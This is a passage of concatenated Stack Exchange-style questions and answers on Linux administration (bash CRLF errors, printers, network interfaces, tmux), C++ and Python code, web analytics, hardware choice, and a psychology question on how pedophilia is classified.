mounted filesystem without journal. 
Opts: (null) [ 13.373777] init: failsafe main process (695) killed by TERM signal [ 13.522415] r8169 0000:03:02.0 eth1: link up [ 13.522425] IPv6: ADDRCONF(NETDEV_CHANGE): eth1: link becomes ready [ 14.396050] floppy0: no floppy controllers found [ 15.070379] eth0: Link auto-negotiation speed 1000M bps full duplex [ 19.785242] ip_tables: (C) 2000-2006 Netfilter Core Team [ 19.793870] nf_conntrack version 0.5.0 (16384 buckets, 65536 max) [ 19.960708] init: plymouth-upstart-bridge main process ended, respawning [ 539.437379] dahdi: module verification failed: signature and/or required key missing - tainting kernel [ 539.438150] dahdi: Version: 2.10.2 [ 539.438357] dahdi: Telephony Interface Registered on major 196 [ 540.007096] wctdm24xxp 0000:03:00.0: Port 1: Installed -- AUTO FXO (FCC mode) [ 540.007101] wctdm24xxp 0000:03:00.0: Port 2: Not installed [ 540.007103] wctdm24xxp 0000:03:00.0: Port 3: Not installed [ 540.007106] wctdm24xxp 0000:03:00.0: Port 4: Not installed [ 542.480446] wctdm24xxp 0000:03:00.0: Found a Wildcard TDM: Wildcard TDM410P (0 BRI spans, 1 analog channel) [ 542.489848] dahdi_transcode: Loaded. [ 542.494830] INFO-xpp: revision Unknown MAX_XPDS=64 (8*8) [ 542.494842] INFO-xpp: FEATURE: with PROTOCOL_DEBUG [ 542.494881] INFO-xpp: FEATURE: with sync_tick() from DAHDI [ 542.496867] INFO-xpp_usb: revision Unknown [ 542.496947] usbcore: registered new interface driver xpp_usb [ 542.556913] dahdi_devices pci:0000:03:00.0: local span 1 is already assigned span 1 [ 542.601238] dahdi_echocan_mg2: Registered echo canceler 'MG2'How can I fix this permanent? | lpc_ich: Resource conflict(s) found affecting gpio_ich | ubuntu;asterisk | null |
_hardwarecs.1204 | Consider a user that mainly uses his notebook to:

- surf the web
- open 4~6 browser tabs (ex: Google + YouTube + Amazon + static pages)
- run MS Office apps (ex: Excel + PowerPoint + email)
- watch videos

For such users, is there already in the market a tablet with the same performance as standard notebooks?

ps: Budget is not a constraint (say < US$5000). Of course the cheapest would be better. | Tablet vs Laptop | laptop;performance;tablet | Nowadays, many tablets have the same performance as laptops, or more.

The Microsoft Surface Pro 4 is a very good option for portability and performance. It has a beautiful screen and a powerful processor, and is a generally well-built device.
_webmaster.68986 | I have a website with share-friendly URLs like example.com/register

I implemented A/B testing as a cookie because I don't want ugly unsharable URLs like example.com/registerA and example.com/registerB.

What is the best practice to see A/B testing in Google Analytics, even though the URL is the same? | Google Analytics for cookie-based A/B testing (same URL for A and B) | google analytics;url;cookie;a b testing | Google's Content Experiments is meant for separate A/B URLs, but it can be hacked to use the same URL, as described in this article.

The general idea is to:

1. Use the usual Content Experiments wizard,
2. Fill the 2 A/B URL fields with dummy URLs,
3. Insert JavaScript code to modify page content on the client side.

Thanks Eike for the link!
_codereview.67117 | The goal of my program is to take some headers and fields and display a nicely formatted table like this:

+----------+----------+----------+
|First name|Last name |Middle    |
|          |          |initial   |
+----------+----------+----------+
|This is a |This is a |This is an|
|line.     |longer    |even      |
|          |line.     |longer    |
|          |          |line.     |
+----------+----------+----------+

Certain features aren't implemented yet, so this code review should focus on what is implemented.

As we all know, premature optimization is the root of all evil, but as the program scales, I think it's important to take into consideration what parts of the program might present a bottleneck or be inefficient. For example:

Prefer to pass by value in C++11. Is pass-by-value a reasonable default in C++11?

void display_boxed(std::vector<std::string> fields, int column_width = 10)

Here I pass fields by value to enable move semantics and because I modify fields in the algorithm. If I passed it by reference, it would be incorrect because the changes would reflect upon the caller's copy. If I passed it by const& reference, I would have to initialize a local variable since the parameter would be const. Is this the correct thinking?

Minimize temporaries/copies. I would like comments on how parts of my code could be improved to achieve this goal.

Then I would like to focus on another aspect: scalability. As many of us have suffered through before, we start writing code and then realize that in order to accommodate different requirements, a large amount of refactoring has to be done. Is my code scalable?

Code reuse. How can I refactor my code to improve code reuse?

And finally, in general, I'd just like comments on the algorithm and how it can be improved.

#include <algorithm>
#include <iomanip>
#include <iostream>
#include <sstream>
#include <string>
#include <vector>

// http://rosettacode.org/wiki/Word_wrap#C.2B.2B
std::string wrap(const char *text, size_t line_length = 72)
{
    std::istringstream words(text);
    std::ostringstream wrapped;
    std::string word;

    if (words >> word) {
        wrapped << word;
        size_t space_left = line_length - word.length();
        while (words >> word) {
            if (space_left < word.length() + 1) {
                wrapped << '\n' << word;
                space_left = line_length - word.length();
            } else {
                wrapped << ' ' << word;
                space_left -= word.length() + 1;
            }
        }
    }
    return wrapped.str();
};

void display_boxed(std::vector<std::string> fields, int column_width = 10)
{
    // TODO: Center justify for headers.
    auto adjustfield = std::left;
    int max_linebreaks = 0;
    for (auto&& str : fields) {
        int count = std::count(str.begin(), str.end(), '\n');
        if (count > max_linebreaks)
            max_linebreaks = count;
    }

    // We're operating on a copy so it's OK to change the elements
    // of fields.
    for (int i = 0; i <= max_linebreaks; ++i) {
        std::cout << "|";
        for (std::vector<std::string>::size_type j = 0; j < fields.size(); ++j) {
            auto it = std::find(fields[j].begin(), fields[j].end(), '\n');
            if (it != fields[j].end()) {
                std::string s{fields[j].begin(), it};
                std::cout << std::setw(column_width) << adjustfield << s << "|";
                fields[j] = std::string{it + 1, fields[j].end()};
            } else {
                std::cout << std::setw(column_width) << adjustfield << fields[j] << "|";
                fields[j] = "";
            }
        }
        std::cout << "\n";
    }
}

int main()
{
    // TODO: Generate column_width.
    constexpr int column_width = 10;

    std::vector<std::string> headers;
    headers.emplace_back(wrap("First name", column_width));
    headers.emplace_back(wrap("Last name", column_width));
    headers.emplace_back(wrap("Middle initial", column_width));

    // TODO: Account for more than 3 fields.
    std::vector<std::string> fields;
    fields.emplace_back(wrap("This is a line.", column_width));
    fields.emplace_back(wrap("This is a longer line.", column_width));
    fields.emplace_back(wrap("This is an even longer line.", column_width));

    std::string horiz_linebr("+");
    for (std::vector<std::string>::size_type j = 0; j < fields.size(); ++j) {
        horiz_linebr += std::string(column_width, '-');
        horiz_linebr += "+";
    }
    horiz_linebr += "\n";

    std::cout << horiz_linebr;
    display_boxed(headers);
    std::cout << horiz_linebr;
    display_boxed(fields);
    std::cout << horiz_linebr;
    return 0;
} | Formatting database like table | c++;optimization;algorithm;c++11 | null
_unix.150448 | I installed a new icon set (numix), however not all icons were changed (e.g. the software manager). How can I manually change icons? | Change icons of application in Linux Mint | linux mint;icons | One way of finding the location of the icon for an application is to add it to the panel (right click > add to panel) and then right click on the newly added icon to edit it. By clicking on the icon in Launcher Properties you'll get its location. For instance, mintInstall is found in /usr/lib/linuxmint/mintInstall/icon.svg

Having this, you can then replace the icon with your own file, and you can remove the application from the panel again.
_unix.145223 | So when I run this code on my Mac there are no errors, and it provides me the perfect output. But when I run it on Ubuntu or CentOS I get the following error:

integer expression expected

#!/bin/bash
if [ -f $1 ] ;then
    sum=0
    echo "#Name Surname City Amount"
    while read -r LINE || [[ -n $LINE ]]; do
        firstName=$( echo $LINE | cut -d" " -f1)
        lastName=$( echo $LINE | cut -d" " -f2)
        city=$( echo $LINE | cut -d" " -f3)
        amount=$( echo $LINE | cut -d" " -f9)
        check=$( echo $amount | grep -c "[0-9]")
        if [ $check -gt 0 ]; then
            if [ $amount -gt 999 ] ; then
                state=$(echo $LINE | cut -d" " -f5)
                correctState=$(echo $state | grep -c "^N[YCEJ]")
                if [ $correctState -gt 0 ] ; then
                    echo $firstName $lastName $state $city $amount
                    sum=`expr $sum + $amount`
                fi
            fi
        fi
    done < $1
    echo
    echo "The sum is all printed amounts is $sum"
    echo
else
    echo "No file found"
fi

Input File:

#Name Surname City Company State Probability Units Price Amount
Tony Passaquale Edenvale Sams_Groceries_Inc. NJ 90 800 4.78 3824
Nigel Shanford Atlanta Fulton_Hotels_Inc. GA 40 400 9.99 3996
Selma Cooper Eugene Cooper_Inns OR 40 1000 9.99 9990
Allen James San_Jose City_Center_Lodge CA 40 1000 9.99 9990
Bruce Calaway Irvine Penny_Tree_Foods CA 80 1000 4.99 4990
Gloria Lenares Chicago Cordoba_Coffee_Shops IL 60 200 9.99 1998
Wendy Leach New_York Gourmet_Imports NY 100 100 10 1000
Craig Flanders Omaha Fly_n_Buy NE 40 1200 9.49 11388
Montgomery Weissenborn Chicago Shariott_Suites_Hotels IL 60 400 7.98 3192
Shirley Brightwell San_Francisco Pacific_Cafe_Company CA 80 2900 1.75 5075
Roger Vittorio Cleveland National_Associa OH 40 1000 9.99 9990
Tony Passaquale Edenvale Sams_Groceries NJ 90 1000 2.29 2290
Montgomery Weissenborn Los_Angeles Shariott_Suites_Hotels CA 90 5000 1.49 7450
Michael Wiggum Los_Angeles Trader_Depot CA 70 800 2.5 2000
Edna Brock Raleigh Elliott's_Department_Stores NC 70 14400 1.78 25632
Gloria Lenares Chicago Cordoba_Coffee_Shops IL 90 600 8.99 5394
Montgomery Weissenborn Seattle Shariott_Suites_Hotels WA 90 400 8.99 3596
Beth Munin Seattle Little_Corner_Sweets WA 100 400 1.39 556
Tim Kelly New_York Nuts_and_Things NY 60 100 9.99 999
Bart Perryman San_Francisco Kwik-e-mart CA 90 40000 0.69 27600
Stacey Gordon Irvine Penny_Tree_Foods CA 70 200 12.96 2592
Heather Willis Atlanta Big_Chuck_Diners GA 80 400 4.99 1996
Tim Kelly New_York Nuts_and_Things NY 70 600 1.49 894
Ralph Khan New_York Gigamart NY 30 600 9.99 5994
Joshua Newsom New_York Trader_Depot NY 90 800 7.99 6392
Edna Brock Raleigh Elliott's_Department_Stores NC 90 9200 1.88 17296
Edna Brock Raleigh Elliott's_Department_Stores NC 100 4400 1.98 8712
Michael Wiggum Los_Angeles Trader_Depot CA 100 600 2.5 1500
Joshua Newsom New_York Trader_Depot NY 90 600 2.5 1500
Edna Brock Raleigh Elliott's_Department_Stores NC 100 8800 1.68 14784
Heather Willis Atlanta Big_Chuck_Diners GA 100 200 4.99 998
Beth Munin Seattle Little_Corner_Sweets WA 100 200 2.49 498
Shirley Brightwell San_Francisco Pacific_Cafe_Company CA 100 1200 1.89 2268
Tim Kelly New_York Nuts_and_Things NY 90 14000 2.29 32060

Output (expected; this works only on Mac):

#Name Surname City Amount
Tony Passaquale NJ Edenvale 3824
Wendy Leach NY New_York 1000
Craig Flanders NE Omaha 11388
Tony Passaquale NJ Edenvale 2290
Edna Brock NC Raleigh 25632
Ralph Khan NY New_York 5994
Joshua Newsom NY New_York 6392
Edna Brock NC Raleigh 17296
Edna Brock NC Raleigh 8712
Joshua Newsom NY New_York 1500
Edna Brock NC Raleigh 14784
Tim Kelly NY New_York 32060

The sum is all printed amounts is 130872

Output (on Ubuntu or CentOS):

#Name Surname City Amount
: integer expression expected
: integer expression expected
: integer expression expected
./script.sh: line 13: [: 9.99: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected
: integer expression expected

The sum is all printed amounts is 0 | Solution to integer expression expected | bash;scripting;grep | 
A carriage return causes your terminal to overwrite the current line with the subsequent text, so if a field contains something like 1234 where is a carriage return, the shell displays the error message 1234: integer expression expected, and the 1234 is overwritten by : in.You're getting a carriage return because your input file is a Windows text file and this is the last field on the line. To use the file under Linux or Cygwin, you need to convert it to a Unix text file. Windows text files use the two-character sequence CR-LF (carriage return, line feed) to mark the end of a line. Unix text files use the single character LF. So when Linux sees a Windows text file, it sees that each line is terminated by a CR character which is a valid character, but rarely a desired one, and is not a valid character in an integer.The message 9.99: integer expression expected shows that there's a line where 9.99 is in the 9th field. From your sample data it looks like this is expected in the 8th field, so you have a line with bad data (probably a spurious space one of the name fields).Your script is very cumbersome. Don't check whether the argument is a regular file: this serves no useful purpose (the redirection will fail if the file doesn't exist) and makes it impossible to use a pipe as input. Don't use cut to parse fields: read can do it (assuming there are no empty fields). The || [[ -n $LINE ]] fragment doesn't do anything useful (but do make sure that your input is a valid text file; in a valid non-empty text file, the last character is LF). Use shell arithmetic instead of expr. As a general principle, use double quotes around variable substitutions (though here it won't matter with valid data but consider what could happen if someone wrote * in a field). 
Untested rewrite:

#!/bin/bash
set -e
sum=0
echo "#Name Surname City Amount"
while read -r firstName lastName city f4 state f6 f7 f8 amount; do
  if [ "$amount" -gt 999 ] ; then
    case $state in
      N[YCEJ])
        echo "$firstName $lastName $state $city $amount"
        sum=$((sum + amount));;
    esac
  fi
done < "$1"
echo
echo "The sum is all printed amounts is $sum"
echo

This would be easier altogether as an awk script. Again, untested.

awk '
    $9 > 999 && $5 ~ /^N[YCEJ]$/ {
        print $1, $2, $5, $3, $9;
        sum += $9;
    }
    END { print "\nThe sum is all printed amounts is " sum }
' < "$1"
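Either way, the data file itself still has to be converted from CRLF to LF before the numeric comparisons can work. A minimal sketch of the conversion (using plain tr on a generated sample file; dos2unix does the same job where it is installed):

```shell
# Build a small "Windows" file with CRLF line endings, then strip the CRs.
printf 'Tony Passaquale 3824\r\nWendy Leach 1000\r\n' > input.txt
tr -d '\r' < input.txt > input.unix   # dos2unix input.txt also works, where available
mv input.unix input.txt
```

After this, the fields read from the file no longer carry a trailing carriage return, and integer tests like [ "$amount" -gt 999 ] behave as expected.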
_cogsci.587 | There are some different claims being made that pedophilia is a sexual orientation rather than a mental disorder.

At the moment there seems to be a growing group of psychologists advocating that pedophilia is, or at least should be considered, a sexual orientation rather than a mental disorder.

For example:

GOOD: You're a member of a growing group of psychologists who say pedophilia should be considered a sexual orientation. Why?

Quinsey: Part of the definition of pedophilia is a person has a preference for a particular kind of partner. [...] pedophiles, unlike other men, show substantial sexual interest in prepubescent children. As far as we know - and many people have tried - these sexual interests are not modifiable by any method that's been tried yet. So it appears like pedophilia is a sexual orientation. [...] You also can't modify that interest; it's stable through adulthood, just like pedophilia.

Another example:

Pedophiles are not simply people who commit a small offence from time to time but rather are grappling with what is equivalent to a sexual orientation just like another individual may be grappling with heterosexuality or even homosexuality, emphasized Van Gijseghem.

True pedophiles have an exclusive preference for children, which is the same as having a sexual orientation. You cannot change this person's sexual orientation. He added, however: He may however remain abstinent.

There is also an advocacy/support group for people attracted to minors, B4UACT, who state in a section from their website (emphasis mine):

Why do you say that minor-attracted people are stereotyped?

Popular beliefs about minor-attracted people are not supported by the evidence. Research shows that they are no more violent or aggressive than the general population, nor do they suffer from psychopathology or personality disorders.
As a group, they do not share any particular characteristics or behaviors other than their feelings of attraction.

As I understand things, mental disorders tend to have observable associated symptoms, while a sexual orientation would not, as it is just an instinctive attraction (in the general sense of the term).

Are there studies that suggest that pedophilia is a sexual orientation? Do traits typically associated with a mental disorder apply to pedophilia? | Is pedophilia a sexual orientation or a mental disorder? | terminology;reference request;abnormal psychology;psychiatry;physical attraction | Before trying to give any sort of answer, it is important to address a common misconception. In popular culture, the terms child-molester and pedophile are often equated. Scientifically, they are not at all the same. The approximate scientific definition for a pedophile is:

an individual that has an unwavering sexual attraction to prepubescent children similar to the attraction heterosexual men have for women

This means that a pedophile might or might not molest children, and a child-molester might or might not be a pedophile. Further, implicit in this definition is a close resemblance to a sexual orientation, and if you want a thorough and careful discussion of this (much better than my answer) then read:

Seto, M. C. (2012) Is Pedophilia a Sexual Orientation? Archives of Sexual Behavior 41(1): 231-236.

Now, the actually relevant scientific discussion (as opposed to merely a semantic distinction) is threefold: (1) can pedophilia be considered a choice in the legal sense? (2) what causes it? (3) can it be treated?

Note that for what we typically consider sexual orientations, questions (1) and (3) have clear answers: no, and no. However, for mental disorders, all permutations of answers to (1) and (3) are possible. Thus, answering these questions does not let you clear up the semantic ambiguity.

To start with question (2): in broad strokes, Blanchard et al. (1999) and Cantor et al.
(2004) suggest that pedophilia has a prenatal cause. For question (3) there has been no evidence to suggest that pedophilia can be treated or cured, much like how you cannot cure homosexuality. This led to Van Gijseghem's expert testimony before the Canadian Parliament's Standing Committee on Justice and Human Rights that you quote from in your question. He concludes that pedophilia cannot be 'cured' through penal intervention. However, it is possible for a pedophile to abstain from becoming a child-molester. This leaves us with question (1), the legal part of this. In Canada, being a pedophile is not a crime, but molesting children is a crime. The status of pedophilia as a mental disorder or sexual orientation is irrelevant to this since both mental status and sexual orientation are protected by Canadian law as long as they do not infringe on others' rights. To help pedophiles abstain from molesting children there is the Circles of Support and Accountability (CoSA) program (note: it deals with all kinds of sexual offenders, not just child-molesters). Wilson et al. (2007, 2009) have shown that CoSA produces a dramatic decrease in re-offence rates for sexual offenders.
_unix.350714 | I'm trying to use this old technology called USB ;) I call it old because all the tutorial that I find on-line deal with wireless printers or IP ones. The man for lpadmin is very unclear how to go about adding a USB printer, and so I come here for some help. When I print dmesg I can see my printer being detected over USBusb 1-1.3: new high-speed USB device number 7 using dwc_otgusb 1-1.3: New USB device found, idVendor=03f0, idProduct=2b17usb 1-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=3usb 1-1.3: Product: HP LaserJet 1020usb 1-1.3: Manufacturer: Hewlett-Packardusb 1-1.3: SerialNumber: FN0JW5Eusblp 1-1.3:1.0: usblp0: USB Bidirectional printer dev 7 if 0 alt 0 proto 2 vid 0x03F0 pid 0x2B17My question isHow can I add it, because it seams this command is adding the printer but there is no communication, and I'm not sure if I have malformed the USB part:lpadmin -p HP1020 -E -v usb://Hewlett-Packard/HP%20LaserJet%201020?serial=FN0JW5E -m lsb/usr/hplip/HP/hp-laserjet_1020-hpijs.ppdAlso, what would be the simplest command to check if I can communicate with the printer. I don't need to print anything, just to be able to see there is communication. This will help me debug the drivers. | How to add a USB printer using lpadmin | usb;printer;lp | null |
_softwareengineering.301092 | In a current project of mine, I have decided to not put any significant amount of code in __init__.py files, simply because I don't like them. In my head, an __init__.py file is just there to inform Python that the folder is a module. I keep forgetting that they might contain lots of code just like any other Python module.In this project I have decided to create a main submodule whenever I'm tempted to put significant amounts of code in an __ini__.py file, then I import the main submodule in __init__.py and replace the module.For example, say I have a module named alpha:alpha/ __init__.pyAnd I want to put a few constants and helper methods under the alpha module. Instead of putting the code into __init__.py I create a new module called (for example) main:alpha/ __init__.py main.pyThen I put my stuff in that module. Then I just put this into __init__.py:import sysimport alpha.mainsys.modules[alpha] = alpha.mainNow I can put stuff into alpha/main.py:author = John Hancockmaintainer = John HancockAnd access it like this:import alphaprint(alpha.maintainer)It works perfectly, and I'm loving that I don't have to edit __init__.py files anymore.However, this kind of magic always gives me the feeling that a more experienced Python ninja would chop me in the face if he caught me.This convention seems completely innocuous to me, but could it come back to bite me in the ass later? Are there any pitfalls I should look out for? | Are there any pitfalls when replacing a Python module using sys.modules? | python;python 3.x | An alternative that doesn't abuse python so much, is to put the following in your __init__.pyfrom .main import *Its not quite the same as replacing the module, but I would suspect it will work in most cases.However, I would take the theory that you shouldn't do it. Pretending that your code is in the root of the alpha module when it is isn't just confusing. |
_unix.42190 | I have an unmanaged dedicated server that I administer, running CentOS. Recently when I reboot the server, I am unable to use SSH. Both times this has happened the server host has determined the issue and explained it like this:Please check now - I'm not sure how and why but eth0 and eth1 were both active on boot (there should only be one). I've fixed this and rebooted the server which came up cleanly with network connectivity. If you have any application that could be making this change, kindly disable the same as well.So in order for me to check into this myself, I am wondering where to look in order to see the settings he is describing there? That way I can configure it myself and try and determine if any programs are changing this.Note: I have been using the 'reboot' command, could this be resetting the ONBOOT status? | How do I configure which ethernet connections are active on boot? | centos;ethernet;startup | cd into /etc/sysconfig/network-scripts. In there, you will find ifcfg-eth0 and ifcfg-eth1. Edit them, and set the ONBOOT line's values to yes and no, respectively. (Or vice versa, if it's eth1 you'd rather come up on boot.)If you have to prevent the kernel from even attempting to touch the Ethernet hardware, you can pound out the eth1 line in /etc/modprobe.conf. Something like this:#alias eth1 e1000The e1000 bit will be the driver name; it varies depending on the hardware in the machine. You'll find the line without the # at the start; add it.A better solution, if simply touching this hardware is a problem, is to remove access to it entirely at the hardware/VM level. If it's a VM, you'd remove it from the VM configuration. If it's real hardware, you'd disable the second Ethernet interface in the machine's firmware. (BIOS, EFI...) |
_unix.344899 | I've recently upgraded my PostgreSQL Server from 9.2 to 9.4. With these changes, I've updated a PostgreSQL Utilities RPMs POM.xml from<groupId>org.codehaus.mojo</groupId><artifactId>rpm-maven-plugin</artifactId><require>postgresql92-postgresql</require>to<groupId>org.codehaus.mojo</groupId><artifactId>rpm-maven-plugin</artifactId><require>rh-postgresql94-postgresql</require>and the new RPMs are installed as a pre-requisite to installing the utilities package.What's the best way to yum-remove the old RPMs? (postgresql92-postgresql)Should I just add it to the post-install script or can I do this via POM.xml as I have done to install the RPMs? | Post-install Yum Remove Dependency | rhel;yum;rpm | null |
_softwareengineering.346841 | what would be the more idiomatic way to recover from a failed futureval fut: Future[Option[Int]] = Future.failed(new RuntimeException(Hi, I have failed))case class ApplicationException(msg: String) extends RuntimeException(msg)al take1Fut = fut.recover{ case e: RuntimeException => throw ApplicationException(I have some business value)}val take2Fut = fut.transform( identity, {case e: RuntimeException => throw ApplicationException(I have some business value)})val take3Fut = fut.fallbackTo( Future.failed(ApplicationException(I have some business value)))Or is there some other, more idiomatic way? Personally, I favor the take1Fut | iodiomatic future failures in scala | scala;idioms;failure | null |
_unix.102170 | I am able to bind Ctrl-Alt-[a-z] using M-C-a, M-C-b etc.However, when I attempt to bind Ctrl-Alt and a number key I get:.tmux.conf: 45: unknown key: M-C-0Any idea why? I'm running tmux ver 1.7Related: How to bind Ctrl-Alt-b as the prefix of tmux? | How can I bind Ctrl-Alt-[0-9] in Tmux? | tmux | The problem is that tmux does not expect a control0.In key_string_lookup_string, it strips off the modifiers, and then (because you have the control modifier) tries to convert it from something like ^A (see source code). But ASCII digits range from 48 to 57, and you can see from the code that tmux will not accept a digit, returning KEYC_UNKNOWN (a failure):/* Convert the standard control keys. */if (key < KEYC_BASE && (modifiers & KEYC_CTRL) && !strchr(other, key)) { if (key >= 97 && key <= 122) key -= 96; else if (key >= 64 && key <= 95) key -= 64; else if (key == 32) key = 0; else if (key == 63) key = KEYC_BSPACE; else return (KEYC_UNKNOWN); modifiers &= ~KEYC_CTRL;} |
_unix.322761 | I have a 7gb text fileI need to edit n first lines of that file (let us assume n=50)I want to do this the following way:head -n 50 myfile >> tmpvim tmp # make necessary editssubstitute first 50 lines of myfile with the contents of tmprm tmphow do I complete the third step here? better solutions to the general problem are also appreciatednote: there is no GUI in this environment | overwrite first n lines of a file | files | man tail says: -n, --lines=[+]NUM output the last NUM lines, instead of the last 10; or use -n +NUM to output starting with line NUMtherefore you can dotail -n +51 myfile >>tmp |
_unix.365118 | How can I connect to my desktop version of Linux from Windows? I need graphics mode. | Remote desktop connection to linux from windows | linux;remote desktop | null
_softwareengineering.267576 | My question is related to the MVC design pattern and the Razor syntax introduced by Microsoft. While learning the MVC design pattern I was told that the idea is based upon a principle known as Separation of Concerns. But Razor syntax allows us to use C# in Views directly. Isn't this an intersection of concerns? | If MVC is Separation of Concerns then why was Razor Syntax introduced? | c#;asp.net mvc;separation of concerns;razor | You are conflating the Razor syntax with separation of concerns.

Separation of concerns has to do with how you structure your code.

Being able to use C# in views doesn't prevent that. It has nothing to do with separation of concerns as such.

Sure, you can structure the code in your view to not comply with separation of concerns, but what about C# code that is used for display purposes only? Where would that live?
_softwareengineering.190240 | I heard that the context analysis diagram has different levels. I couldn't find this in .Net, but I have seen that a DFD has different levels. Do context diagrams have any levels (level0, level1, level2)? If yes, please suggest some examples. | Do context diagrams have levels? | diagrams;data flow diagram | The answer depends upon what type of Context Diagram you are referring to.

System Context Diagrams have a single layer only. So the answer is No. From the Wikipedia article:

This diagram is the highest level view of a system.

IDEF0 Top Level Context Diagrams have a single top-level context diagram and then have optional 'child' diagrams below that. So the answer here would be Yes.

The IDEF0 process starts with the identification of the prime function to be decomposed. This function is identified on a Top Level Context Diagram, that defines the scope of the particular IDEF0 analysis. ... From this diagram lower-level diagrams are generated.
_unix.90126 | How do I turn off SMTP AUTH PLAIN for Citadel 8.20 on Slackware 14.0?

If I set up Postfix to handle SMTP, would this allow me to not have SMTP AUTH PLAIN enabled? | How to disable SMTP auth plain for Citadel 8.20 on Slackware 14.0? | email;slackware;smtp;slackbuilds | null
_unix.4708 | There are 3 tiling modes in KDE: spiral, columns and floating. What does each do, and how do I make them work for me? For example, spiral seems to cut my screen in half, then the next half another way. Is it possible to adjust it so that it's like 2/3? I don't understand how to make use of float. Perhaps someone could explain what each is for (or one for each answer) and how they can be used and tuned. | What is the difference between the various tiling modes in KWin, and how do I use them? | kde;window manager;kwin;tiling wm | null
_unix.360843 | If for example I have compiled a simple C program that uses GTK 3 on a machine running Ubuntu, will I be able to run it on other Linux flavours?

Note: My actual question is "Should I label my compiled program for Linux or just Ubuntu?"

e.g. Should I label my downloads page as

Windows program.exe
Linux program
Macintosh program.app

or

Windows program.exe
Ubuntu < Version 17.04 program
Macintosh program.app | Compiled Executable | compiling;c;gtk;compatibility;software distribution | Linux executables are not specific to a Linux distribution. But they are specific to a processor architecture and to a set of library versions.

An executable for any operating system is specific to a processor architecture. Windows and Mac users don't care as much because these operating systems more or less only run on a single architecture. (OSX used to run on multiple processor architectures, and OSX applications were typically distributed as a bundle that contained code for all supported processor architectures, but modern OSX only runs on amd64 processors. Windows runs on both 32-bit and 64-bit Intel processors, so you might find 32-bit and 64-bit Windows executables.)
libgtk-3.so.0 is the main GTK3 library, with version 0 (if there ever was a version 1, it would be incompatible with version 0, that's the reason to change the version number). Some of these libraries are things that everyone would have anyway because they haven't changed in many years; only experience or a comparison by looking at multiple distributions and multiple releases can tell you this. Users of other distributions can run the same binary if they have compatible versions of the libraries. |
_unix.167326 | Can we use a semicolon to separate a background job from the following one?

$ nohup evince tmp1.pdf &; nohup evince tmp.pdf &
bash: syntax error near unexpected token `;' | Using semicolon to separate a background job from the following one? | background process | null
_codereview.102586 | I'm learning about using LESS and wanted to get anyone's input on if I'm using the concepts, syntax, etc. correctly.I know this might seem subjective and not the correct place to post, so please let me know if there is a more appropriate place to do this. LESS code.centered(@position: inline, @width: 100%){ margin-left: auto; margin-right: auto; width: @width; display: @position;}.table-center(@width: 100%){ width:@width; display:table!important; text-align:center; &:nth-child(1) { display:table-cell; } }.clear-border-radius{ border-radius: initial; -webkit-border-radius: initial; -moz-border-radius: initial;}.shadowbox-format(@caption-font-size, @button-font-size, @shadowbox-margin) { display: block; position: absolute; min-height: 85px; width: 60%; margin: @shadowbox-margin; left: 20%; .shadowbox-caption { font-size: @caption-font-size; .table-center; } .shadowbox-button-wrapper { width: 35%; margin: 26px auto 0; & > a { .clear-border-radius; font-size: @button-font-size; } }}.home-slide-container{ img{ .centered(block); height:auto; }}.callout-header{ text-align:center; width: auto; margin: 40px auto 0; border-bottom: 1px solid #9e9e9e; padding: 0 0 30px; @media (max-width: @screen-xs-max){ width: 90%; } @media (min-width: @screen-sm-min){ width: 60%; } span{ font-size: 24px; }} .carousel-shadowbox { text-transform: uppercase; color:#000; background-color:rgba(255,255,255,0.4); @media (max-width: @screen-xs-max) { background-color: white; opacity:1.0; .shadowbox-caption{ .table-center; span{ font-size: 16px; font-weight: 100; } } } @media (min-width: @screen-sm-min) { .shadowbox-format(20px, 16px, -91px auto 0); } @media (min-width: @screen-md-min) { .shadowbox-format(22px, 18px, -96px auto 0); } @media (min-width: @screen-lg-min) { .shadowbox-format(24px, 20px, -102px auto 0); } } .callout{ position:relative; margin-top: 5%; img{ @media (max-width: @screen-xs-max){ margin: 0 auto; } } .callout-text-container{ padding:3px; @media (min-width: 
@screen-sm-min) and (max-width: @screen-sm-max) { bottom:22px; } min-height: 200px; .callout-title{ padding-top: 5px; text-transform: capitalize; font-size: 22px; display:table; width:100%; text-align:center; margin-bottom: 25px; span{ display: table-cell; } } .callout-body{ font-size: 15px; padding:8px; text-align:justify; } .button-wrapper{ padding: 10px; a{ text-transform: capitalize; border-bottom: 4px solid #cb2b06; background-color: #e6431e; .clear-border-radius; font-size: 16px; } } } } | LESS CSS, including support for shadowboxes | beginner;css;less css | null |
_unix.165956 | On my Debian laptop I installed kernel 3.14 so I have the alx driver and my Ethernet works; I originally had the 3.2 kernel (Debian 7.7). After installing the new kernel, gnome3 went back to the "failed to start properly" mode and startx didn't find the fglrx module. (Is that a kernel compatibility issue?) Can I install older kernels than 3.14 via apt-get? | Kernel 3.14 not working with ATI proprietary fglrx? | debian;kernel;amd;fglrx | FGLRX has very poor performance (among other issues, which may include kernel compatibility issues with newer kernels). Heed my advice: you need to use the Open-Source Radeon drivers. https://wiki.debian.org/AtiHowTo I'm running Kernel 3.14+ on an ATI Radeon 5770HD with the Open-Source drivers. The solution is not to downgrade your kernel. Download the Open-Source drivers via apt-get from the provided link. The X server should pretty much take care of itself when you install the new packages. |
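A sketch of the switch the answer recommends, to run as root; the package names below are taken from the linked Debian wiki page (AtiHowTo), not from the answer itself, so verify them against your release:

```shell
# Hypothetical helper wrapping the wiki's steps: install the open-source
# Radeon stack and purge the proprietary fglrx packages.
switch_to_radeon() {
    apt-get update
    apt-get install firmware-linux-nonfree libgl1-mesa-dri xserver-xorg-video-ati
    apt-get remove --purge 'fglrx*'
}
```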
_webapps.22392 | I am new to Trello and would have several tasks that I need to do regularly. Is there a way in the due date or check list to do this? | How can I create a recurring task in check lists? | trello | null |
_unix.212646 | I know this question is not obscure, as it has been asked here (and keeps being updated) and duplicated here. What I'm trying to achieve is a bit different. I don't like the idea of my prompt rewriting a file every ls I type (history -a; history -c; history -r). I would like to update the file on exit. That's easy (actually, the default), but you need to append instead of rewriting:

shopt -s histappend

